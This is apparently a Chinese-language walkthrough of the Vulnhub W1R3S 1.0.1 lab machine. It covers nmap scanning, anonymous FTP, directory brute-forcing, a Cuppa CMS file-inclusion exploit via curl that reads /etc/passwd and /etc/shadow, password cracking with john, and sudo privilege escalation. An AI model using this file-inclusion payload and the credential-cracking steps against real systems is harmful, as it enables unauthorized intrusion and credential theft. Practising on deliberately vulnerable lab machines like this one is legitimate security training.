Vulnhub W1R3S: 1.0.1

Vulnhub W1R3S: 1.0.1

0x01:端口扫描

主机发现，靶机ip：192.168.231.133

nmap -sn 192.168.231.0/24

-sn 仅主机扫描

/24 扫描c段

详细全端口扫描

nmap -sT -sC -sV -O -p21,22,80,3306 192.168.231.133 -oA /root/scan/1/

-sT： 以TCP进行扫描；

-sC：使用 nmap 的默认脚本集合进行扫描

-sV：启用版本探测；

-O：启用操作系统探测

-p：指定端口

-oA：将扫描结果以三种格式（普通、XML、grepable）输出，并保存在 /root/scan/1/ 文件夹中。

发现有4个服务，21ftp，22ssh，80http，3306mysql，而且ftp可以匿名登录

对web端口进行漏洞扫描

nmap --script=vuln -p80 192.168.231.133

--script=vuln 进行漏洞扫描

有wordpress的login界面

0x02:ftp渗透

使用anonymous进行匿名登录

提示我们使用binary模式去传输文件

我们在content目录下找到有三个txt文件，我们全部get下来

我们再把其他目录的文件也get下来，我们依次看

从以上图片中我们可以得知以下信息：

​ 1.得到两串字符串

​ 2.The W1R3S.inc

​ 3.一个hint

​ 4.员工名单

我们先分析02.txt中的字符串，使用hash-identifier识别出第一串为md5，第二串为base64

0x03:web渗透

首先扫目录

dirsearch -u http://192.168.231.133/

扫到了之前的wordpress登录页，然后administrator有后台，我们继续扫admin子目录

dirsearch -u http://192.168.231.133/administrator

我们再扫wordpress子目录

dirsearch -u http://192.168.231.133/wordpress

我们现在就已经扫描到了以下几个有价值目录

/administrator/installation
/administrator/templates
/wordpress/wp-content/upgrade
/wordpress/wp-content/uploads
/wordpress/wp-login.php

我们进去一个一个看

使用了cuppa CMS，查看漏洞

searchsploit cuppa
searchsploit -m php/webapps/25971.txt

但是没回显，这怎么办呢，我们试试post传参或者curl呢

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.231.133/administrator/alerts/alertConfigField.php

-s：让 curl 在执行过程中不输出任何进度信息或错误信息，只返回请求的结果。

--data-urlencode：表示将请求数据进行 URL 编码并以 POST 请求的形式发送。--data-urlencode 是对数据进行 URL 编码的选项，可以防止一些特殊字符（如 &、? 等）干扰请求格式。

看来两者都可以，我们看到w1r3s这个用户是可以登录的，那我们继续拿shadow

然后我们unshadow它

unshadow passwd.txt shadow.txt > password.txt

最后john破解

john password.txt

成功拿到密码！

0x04:权限提升

我们ssh登录到w1r3s用户下

查看权限

无root权限，我们先看看sudo允许执行什么命令

sudo -l

纳尼！提权后我们到root目录下查看

0x05:思考补充

看了fyf大佬的wp后，做几个补充

1.john历史问题，使用--show即可

2.我们之前在ftp上get了员工名单，可以hydra爆破密码